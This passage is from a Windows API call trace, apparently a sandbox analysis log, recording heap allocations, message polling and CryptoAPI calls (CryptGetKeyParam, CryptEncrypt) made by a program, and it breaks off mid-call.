Size=0x8) returned 0x9c26b8 [0173.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0173.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0173.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0173.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0173.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0173.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0173.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.931] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0173.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0173.932] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2878, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2878*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.932] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.933] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0173.934] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0173.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.934] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.935] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.935] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.935] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.935] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.935] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.935] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.935] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.936] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.936] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, 